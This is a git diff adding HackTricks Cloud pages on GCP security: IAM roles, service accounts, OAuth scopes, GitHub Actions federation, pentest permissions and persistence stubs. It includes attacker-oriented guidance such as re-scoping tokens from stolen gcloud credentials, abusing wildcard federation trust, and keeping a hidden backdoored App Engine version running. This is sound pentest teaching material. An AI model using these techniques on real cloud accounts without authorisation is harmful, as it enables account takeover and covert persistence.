+- **Restrict authorized networks on Cloud SQL instances:** Prevents public or non-internal network ranges from accessing your Cloud SQL databases.
+
+* **Restrict Protocol Forwarding Based on type of IP Address:** Prevents VM protocol forwarding for external IP addresses.
+
+- **Restrict Public IP access on Cloud SQL instances:** Prevents the creation of Cloud SQL instances with a public IP, which can expose them to internet traffic.
+
+* **Restrict shared VPC project lien removal:** Prevents the accidental deletion of Shared VPC host projects.
+
+- **Sets the internal DNS setting for new projects to Zonal DNS Only:** Prevents the use of a legacy DNS setting that has reduced service availability.
+
+* **Skip default network creation:** Prevents automatic creation of the default VPC network and related resources. This avoids overly-permissive default firewall rules.
+
+- **Disable VPC External IPv6 usage:** Prevents the creation of external IPv6 subnets, which can be exposed to unauthorized internet access.
+
+</details>
+
+## **IAM Roles**
+
+These are like IAM policies in AWS as **each role contains a set of permissions.**
+
+However, unlike in AWS, there is **no centralized repo** of roles. Instead of that, **resources give X access roles to Y principals**, and the only way to find out who has access to a resource is to use the **`get-iam-policy` method over that resource**.\
+This could be a problem because this means that the only way to find out **which permissions a principal has is to ask every resource who is it giving permissions to**, and a user might not have permissions to get permissions from all resources.
+
+There are **three types** of roles in IAM:
+
+* **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM.
+* **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined_roles).
+* **Custom roles**, which provide granular access according to a user-specified list of permissions.
+
+There are thousands of permissions in GCP. In order to check if a role has a permissions you can [**search the permission here**](https://cloud.google.com/iam/docs/permissions-reference) and see which roles have it.
+
+You can also [**search here predefined roles**](https://cloud.google.com/iam/docs/understanding-roles#product_specific_documentation) **offered by each product.** Note that some **roles** cannot be attached to users and **only to SAs because some permissions** they contain.\
+Moreover, note that **permissions** will only **take effect** if they are **attached to the relevant service.**
+
+Or check if a **custom role can use a** [**specific permission in here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.**
+
+{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %}
+[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md)
+{% endcontent-ref %}
+
+## Users <a href="#default-credentials" id="default-credentials"></a>
+
+In **GCP console** there **isn't any Users or Groups** management, that is done in **Google Workspace**. Although you could synchronize a different identity provider in Google Workspace.
+
+You can access Workspaces **users and groups in** [**https://admin.google.com**](https://admin.google.com/).
+
+**MFA** can be **forced** to Workspaces users, however, an **attacker** could use a token to access GCP **via cli which won't be protected by MFA** (it will be protected by MFA only when the user logins to generate it: `gcloud auth login`).
+
+## Groups
+
+When an organisation is created several groups are **strongly suggested to be created.** If you manage any of them you might have compromised all or an important part of the organization:
+
+<table data-header-hidden><thead><tr><th width="299.3076923076923"></th><th></th></tr></thead><tbody><tr><td><strong>Group</strong></td><td><strong>Function</strong></td></tr><tr><td><strong><code>gcp-organization-admins</code></strong><br><em>(group or individual accounts required for checklist)</em></td><td>Administering any resource that belongs to the organization. Assign this role sparingly; org admins have access to all of your Google Cloud resources. Alternatively, because this function is highly privileged, consider using individual accounts instead of creating a group.</td></tr><tr><td><strong><code>gcp-network-admins</code></strong><br><em>(required for checklist)</em></td><td>Creating networks, subnets, firewall rules, and network devices such as Cloud Router, Cloud VPN, and cloud load balancers.</td></tr><tr><td><strong><code>gcp-billing-admins</code></strong><br><em>(required for checklist)</em></td><td>Setting up billing accounts and monitoring their usage.</td></tr><tr><td><strong><code>gcp-developers</code></strong><br><em>(required for checklist)</em></td><td>Designing, coding, and testing applications.</td></tr><tr><td><strong><code>gcp-security-admins</code></strong><br></td><td>Establishing and managing security policies for the entire organization, including access management and <a href="https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints">organization constraint policies</a>. See the <a href="https://cloud.google.com/architecture/security-foundations/authentication-authorization#users_and_groups">Google Cloud security foundations guide</a> for more information about planning your Google Cloud security infrastructure.</td></tr><tr><td><strong><code>gcp-devops</code></strong></td><td>Creating or managing end-to-end pipelines that support continuous integration and delivery, monitoring, and system provisioning.</td></tr><tr><td><strong><code>gcp-logging-admins</code></strong></td><td></td></tr><tr><td><strong><code>gcp-logging-viewers</code></strong></td><td></td></tr><tr><td><strong><code>gcp-monitor-admins</code></strong></td><td></td></tr><tr><td><strong><code>gcp-billing-viewer</code></strong><br><em>(no longer by default)</em></td><td>Monitoring the spend on projects. Typical members are part of the finance team.</td></tr><tr><td><strong><code>gcp-platform-viewer</code></strong><br><em>(no longer by default)</em></td><td>Reviewing resource information across the Google Cloud organization.</td></tr><tr><td><strong><code>gcp-security-reviewer</code></strong><br><em>(no longer by default)</em></td><td>Reviewing cloud security.</td></tr><tr><td><strong><code>gcp-network-viewer</code></strong><br><em>(no longer by default)</em></td><td>Reviewing network configurations.</td></tr><tr><td><strong><code>grp-gcp-audit-viewer</code></strong><br><em>(no longer by default)</em></td><td>Viewing audit logs.</td></tr><tr><td><strong><code>gcp-scc-admin</code></strong><br><em>(no longer by default)</em></td><td>Administering Security Command Center.</td></tr><tr><td><strong><code>gcp-secrets-admin</code></strong><br><em>(no longer by default)</em></td><td>Managing secrets in Secret Manager.</td></tr></tbody></table>
+
+## **Default Password Policy**
+
+* Enforce strong passwords
+* Between 8 and 100 characters
+* No reuse
+* No expiration
+* If people is accessing Workspace through a third party provider, these requirements aren't applied.
+
+<figure><img src="../../../.gitbook/assets/image (20).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../../.gitbook/assets/image (22).png" alt=""><figcaption></figcaption></figure>
+
+## **Service accounts**
+
+These are the principals that **resources** can **have** **attached** and access to interact easily with GCP. For example, it's possible to access the **auth token** of a Service Account **attached to a VM** in the metadata.\
+It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.
+
+It's similar to **IAM roles from AWS**. But not like in AWS, **any** service account can be **attached to any service** (it doesn't need to allow it via a policy).
+
+Several of the service accounts that you will find are actually **automatically generated by GCP** when you start using a service, like:
+
+```
+PROJECT_NUMBER-compute@developer.gserviceaccount.com
+PROJECT_ID@appspot.gserviceaccount.com
+```
+
+However, it's also possible to create and attach to resources **custom service accounts**, which will look like this:
+
+```
+SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
+```
+
+### **Keys & Tokens**
+
+There are 2 main ways to access GCP as a service account:
+
+* **Via OAuth tokens**: These are tokens that you will get from places like metadata endpoints or stealing http requests and they are limited by the **access scopes**.
+* **Keys**: These are public and private key pairs that will allow you to sign requests as the service account and even generate OAuth tokens to perform actions as the service account. These keys are dangerous because they are more complicated to limit and control, that's why GCP recommend to not generate them.
+  * Note that every-time a SA is created, **GCP generates a key for the service account** that the user cannot access (and won't be listed in the web application). According to [**this thread**](https://www.reddit.com/r/googlecloud/comments/f0ospy/service_account_keys_observations/) this key is **used internally by GCP** to give metadata endpoints access to generate the accesible OAuth tokens.
+
+### **Access scopes**
+
+Access scope are **attached to generated OAuth tokens** to access the GCP API endpoints. They **restrict the permissions** of the OAuth token.\
+This means that if a token belongs to an Owner of a resource but doesn't have the in the token scope to access that resource, the token **cannot be used to (ab)use those privileges**.
+
+Google actually [recommends](https://cloud.google.com/compute/docs/access/service-accounts#service_account_permissions) that **access scopes are not used and to rely totally on IAM**. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programmatically.
+
+You can see what **scopes** are **assigned** by **querying:**
+
+{% code overflow="wrap" %}
+```bash
+curl 'https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=<access_token>'
+
+{
+  "issued_to": "223044615559.apps.googleusercontent.com",
+  "audience": "223044615559.apps.googleusercontent.com",
+  "user_id": "139746512919298469201",
+  "scope": "openid https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/appengine.admin https://www.googleapis.com/auth/sqlservice.login https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/accounts.reauth",
+  "expires_in": 2253,
+  "email": "username@testing.com",
+  "verified_email": true,
+  "access_type": "offline"
+}
+```
+{% endcode %}
+
+The previous **scopes** are the ones generated by **default** using **`gcloud`** to access data. This is because when you use **`gcloud`** you first create an OAuth token, and then use it to contact the endpoints.
+
+The most important scope of those potentially is **`cloud-platform`**, which basically means that it's possible to **access any service in GCP**.
+
+You can **find a list of** [**all the possible scopes in here**](https://developers.google.com/identity/protocols/googlescopes)**.**
+
+If you have **`gcloud`** browser credentials, it's possible to **obtain a token with other scopes,** doing something like:
+
+{% code overflow="wrap" %}
+```bash
+# Maybe you can get a user token with other scopes changing the scopes array from ~/.config/gcloud/credentials.db
+
+# Set new scopes for SDKs credentials
+gcloud auth application-default login --scopes=https://www.googleapis.com/auth/userinfo.email,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/sqlservice.login,https://www.googleapis.com/auth/appengine.admin,https://www.googleapis.com/auth/compute,https://www.googleapis.com/auth/accounts.reauth,https://www.googleapis.com/auth/admin.directory.user,https://www.googleapis.com/auth/admin.directory.group,https://www.googleapis.com/auth/admin.directory.domain,https://www.googleapis.com/auth/admin.directory.user
+
+# Print new token 
+gcloud auth application-default print-access-token
+
+# To use this token with some API you might need to use curl to indicate the project header with --header "X-Goog-User-Project: <project-name>"
+```
+{% endcode %}
+
+## **Terraform IAM Policies, Bindings and Memberships**
+
+As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam) using terraform with GCP there are different ways to grant a principal access over a resource:
+
+* **Memberships**: You set **principals as members of roles** **without restrictions** over the role or the principals. You can put a user as a member of a role and then put a group as a member of the same role and also set those principals (user and group) as member of other roles.
+* **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isn’t binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**.
+* **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role).
+
+## References
+
+* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+* [https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md b/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
new file mode 100644
index 0000000000..0f902f914d
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
@@ -0,0 +1,181 @@
+# GCP - Federation Abuse
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## OIDC - Github Actions Abuse
+
+### GCP
+
+In order to give **access to the Github Actions** from a Github repo to a GCP **service account** the following steps are needed:
+
+* **Create the Service Account** to access from github actions with the **desired permissions:**
+
+```bash
+projectId=FIXME
+gcloud config set project $projectId
+
+# Create the Service Account
+gcloud iam service-accounts create "github-demo-sa"
+saId="github-demo-sa@${projectId}.iam.gserviceaccount.com"
+
+# Enable the IAM Credentials API
+gcloud services enable iamcredentials.googleapis.com
+
+# Give permissions to SA
+
+gcloud projects add-iam-policy-binding $projectId \
+    --member="serviceAccount:$saId" \
+    --role="roles/iam.securityReviewer"
+```
+
+* Generate a **new workload identity pool**:
+
+```bash
+# Create a Workload Identity Pool
+poolName=wi-pool
+
+gcloud iam workload-identity-pools create $poolName \
+  --location global \
+  --display-name $poolName
+
+poolId=$(gcloud iam workload-identity-pools describe $poolName \
+  --location global \
+  --format='get(name)')
+```
+
+* Generate a new **workload identity pool OIDC provider** that **trusts** github actions (by org/repo name in this scenario):
+
+```bash
+attributeMappingScope=repository # could be sub (GitHub repository and branch) or repository_owner (GitHub organization)
+
+gcloud iam workload-identity-pools providers create-oidc $poolName \
+  --location global \
+  --workload-identity-pool $poolName \
+  --display-name $poolName \
+  --attribute-mapping "google.subject=assertion.${attributeMappingScope},attribute.actor=assertion.actor,attribute.aud=assertion.aud,attribute.repository=assertion.repository" \
+  --issuer-uri "https://token.actions.githubusercontent.com"
+
+providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
+  --location global \
+  --workload-identity-pool $poolName \
+  --format='get(name)')
+```
+
+* Finally, **allow the principal** from the provider to use a service principal:
+
+```bash
+gitHubRepoName="repo-org/repo-name"
+gcloud iam service-accounts add-iam-policy-binding $saId \
+  --role "roles/iam.workloadIdentityUser" \
+  --member "principalSet://iam.googleapis.com/${poolId}/attribute.${attributeMappingScope}/${gitHubRepoName}"
+```
+
+{% hint style="warning" %}
+Note how in the previous member we are specifying the **`org-name/repo-name`** as conditions to be able to access the service account (other params that makes it **more restrictive** like the branch could also be used).
+
+However it's also possible to **allow all github to access** the service account creating a provider such the following using a wildcard:
+{% endhint %}
+
+<pre class="language-bash"><code class="lang-bash"># Create a Workload Identity Pool
+poolName=wi-pool2
+
+gcloud iam workload-identity-pools create $poolName \
+  --location global \
+  --display-name $poolName
+
+poolId=$(gcloud iam workload-identity-pools describe $poolName \
+  --location global \
+  --format='get(name)')
+
+gcloud iam workload-identity-pools providers create-oidc $poolName \
+  --project="${projectId}" \
+  --location="global" \
+  --workload-identity-pool="$poolName" \
+  --display-name="Demo provider" \
+  --attribute-mapping="google.subject=assertion.sub,attribute.actor=assertion.actor,attribute.aud=assertion.aud" \
+  --issuer-uri="https://token.actions.githubusercontent.com"
+
+providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
+  --location global \
+  --workload-identity-pool $poolName \
+  --format='get(name)')
+
+<strong># CHECK THE WILDCARD
+</strong>gcloud iam service-accounts add-iam-policy-binding "${saId}" \
+  --project="${projectId}" \
+  --role="roles/iam.workloadIdentityUser" \
+<strong>  --member="principalSet://iam.googleapis.com/${poolId}/*"
+</strong></code></pre>
+
+{% hint style="warning" %}
+In this case anyone could access the service account from github actions, so it's important always to **check how the member is defined**.\
+It should be always something like this:
+
+`attribute.{custom_attribute}`:`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
+{% endhint %}
+
+### Github
+
+Remember to change **`${providerId}`** and **`${saId}`** for their respective values:
+
+```yaml
+name: Check GCP action
+on:
+  workflow_dispatch:
+  pull_request:
+    branches:
+      - main
+
+permissions:
+  id-token: write
+
+jobs:
+  Get_OIDC_ID_token:
+    runs-on: ubuntu-latest
+    steps:
+    - id: 'auth'
+      name: 'Authenticate to GCP'
+      uses: 'google-github-actions/auth@v2.1.3'
+      with:
+          create_credentials_file: 'true'
+          workload_identity_provider: '${providerId}' # In the providerId, the numerical project ID (12 digit number) should be used 
+          service_account: '${saId}'                  # instead of the alphanumeric project ID. ex: 
+          activate_credentials_file: true             # projects/123123123123/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider' 
+    - id: 'gcloud'
+      name: 'gcloud'
+      run: |-
+        gcloud config set project <project-id>
+        gcloud config set account '${saId}'
+        gcloud auth login --brief --cred-file="${{ steps.auth.outputs.credentials_file_path }}"
+        gcloud auth list
+        gcloud projects list
+        gcloud secrets list
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md b/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
new file mode 100644
index 0000000000..8e9d0d77b4
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
@@ -0,0 +1,144 @@
+# GCP - Permissions for a Pentest
+
+If you want to pentest a GCP environment you need to ask for enough permissions to **check all or most of the services** used in **GCP**. Ideally, you should ask the client to create:
+
+* **Create** a new **project**
+* **Create** a **Service Account** inside that project (get **json credentials**) or create a **new user**.
+* **Give** the **Service account** or the **user** the **roles** mentioned later over the ORGANIZATION
+* **Enable** the **APIs** mentioned later in this post in the created project
+
+**Set of permissions** to use the tools proposed later:
+
+```bash
+roles/viewer
+roles/resourcemanager.folderViewer
+roles/resourcemanager.organizationViewer
+```
+
+APIs to enable (from starbase):
+
+```
+gcloud services enable \
+  serviceusage.googleapis.com \
+  cloudfunctions.googleapis.com \
+  storage.googleapis.com \
+  iam.googleapis.com \
+  cloudresourcemanager.googleapis.com \
+  compute.googleapis.com \
+  cloudkms.googleapis.com \
+  sqladmin.googleapis.com \
+  bigquery.googleapis.com \
+  container.googleapis.com \
+  dns.googleapis.com \
+  logging.googleapis.com \
+  monitoring.googleapis.com \
+  binaryauthorization.googleapis.com \
+  pubsub.googleapis.com \
+  appengine.googleapis.com \
+  run.googleapis.com \
+  redis.googleapis.com \
+  memcache.googleapis.com \
+  apigateway.googleapis.com \
+  spanner.googleapis.com \
+  privateca.googleapis.com \
+  cloudasset.googleapis.com \
+  accesscontextmanager.googleapis.com
+```
+
+## Individual tools permissions
+
+### [PurplePanda](https://github.com/carlospolop/PurplePanda/tree/master/intel/google)
+
+```
+From https://github.com/carlospolop/PurplePanda/tree/master/intel/google#permissions-configuration
+
+roles/bigquery.metadataViewer
+roles/composer.user
+roles/compute.viewer
+roles/container.clusterViewer
+roles/iam.securityReviewer
+roles/resourcemanager.folderViewer
+roles/resourcemanager.organizationViewer
+roles/secretmanager.viewer
+```
+
+### [ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki/Google-Cloud-Platform#permissions)
+
+```
+From https://github.com/nccgroup/ScoutSuite/wiki/Google-Cloud-Platform#permissions
+
+roles/Viewer
+roles/iam.securityReviewer
+roles/stackdriver.accounts.viewer
+```
+
+### [CloudSploit](https://github.com/aquasecurity/cloudsploit/blob/master/docs/gcp.md#cloud-provider-configuration)
+
+```
+From https://github.com/aquasecurity/cloudsploit/blob/master/docs/gcp.md#cloud-provider-configuration
+
+includedPermissions:
+  - cloudasset.assets.listResource
+  - cloudkms.cryptoKeys.list
+  - cloudkms.keyRings.list
+  - cloudsql.instances.list
+  - cloudsql.users.list
+  - compute.autoscalers.list
+  - compute.backendServices.list
+  - compute.disks.list
+  - compute.firewalls.list
+  - compute.healthChecks.list
+  - compute.instanceGroups.list
+  - compute.instances.getIamPolicy
+  - compute.instances.list
+  - compute.networks.list
+  - compute.projects.get
+  - compute.securityPolicies.list
+  - compute.subnetworks.list
+  - compute.targetHttpProxies.list
+  - container.clusters.list
+  - dns.managedZones.list
+  - iam.serviceAccountKeys.list
+  - iam.serviceAccounts.list
+  - logging.logMetrics.list
+  - logging.sinks.list
+  - monitoring.alertPolicies.list
+  - resourcemanager.folders.get
+  - resourcemanager.folders.getIamPolicy
+  - resourcemanager.folders.list
+  - resourcemanager.hierarchyNodes.listTagBindings
+  - resourcemanager.organizations.get
+  - resourcemanager.organizations.getIamPolicy
+  - resourcemanager.projects.get
+  - resourcemanager.projects.getIamPolicy
+  - resourcemanager.projects.list
+  - resourcemanager.resourceTagBindings.list
+  - resourcemanager.tagKeys.get
+  - resourcemanager.tagKeys.getIamPolicy
+  - resourcemanager.tagKeys.list
+  - resourcemanager.tagValues.get
+  - resourcemanager.tagValues.getIamPolicy
+  - resourcemanager.tagValues.list
+  - storage.buckets.getIamPolicy
+  - storage.buckets.list
+```
+
+### [Cartography](https://lyft.github.io/cartography/modules/gcp/config.html)
+
+```
+From https://lyft.github.io/cartography/modules/gcp/config.html
+
+roles/iam.securityReviewer
+roles/resourcemanager.organizationViewer
+roles/resourcemanager.folderViewer
+```
+
+### [Starbase](https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md)
+
+```
+From https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md
+
+roles/iam.securityReviewer
+roles/iam.organizationRoleViewer
+roles/bigquery.metadataViewer
+```
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/README.md b/pentesting-cloud/gcp-security/gcp-persistence/README.md
new file mode 100644
index 0000000000..4e8a91f745
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/README.md
@@ -0,0 +1,2 @@
+# GCP - Persistence
+
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
new file mode 100644
index 0000000000..d944527280
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
@@ -0,0 +1,47 @@
+# GCP - API Keys Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## API Keys
+
+For more information about API Keys check:
+
+{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %}
+[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md)
+{% endcontent-ref %}
+
+### Create new / Access existing ones
+
+Check how to do this in:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-apikeys-privesc.md" %}
+[gcp-apikeys-privesc.md](../gcp-privilege-escalation/gcp-apikeys-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
new file mode 100644
index 0000000000..ef9829d837
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
@@ -0,0 +1,47 @@
+# GCP - App Engine Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## App Engine
+
+For more information about App Engine check:
+
+{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %}
+[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md)
+{% endcontent-ref %}
+
+### Modify code
+
+If yoi could just modify the code of a running version or create a new one yo could make it run your backdoor and mantain persistence.
+
+### Old version persistence
+
+**Every version of the web application is going to be run**, if you find that an App Engine project is running several versions, you could **create a new one** with your **backdoor** code, and then **create a new legit** one so the last one is the legit but there will be a **backdoored one also running**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
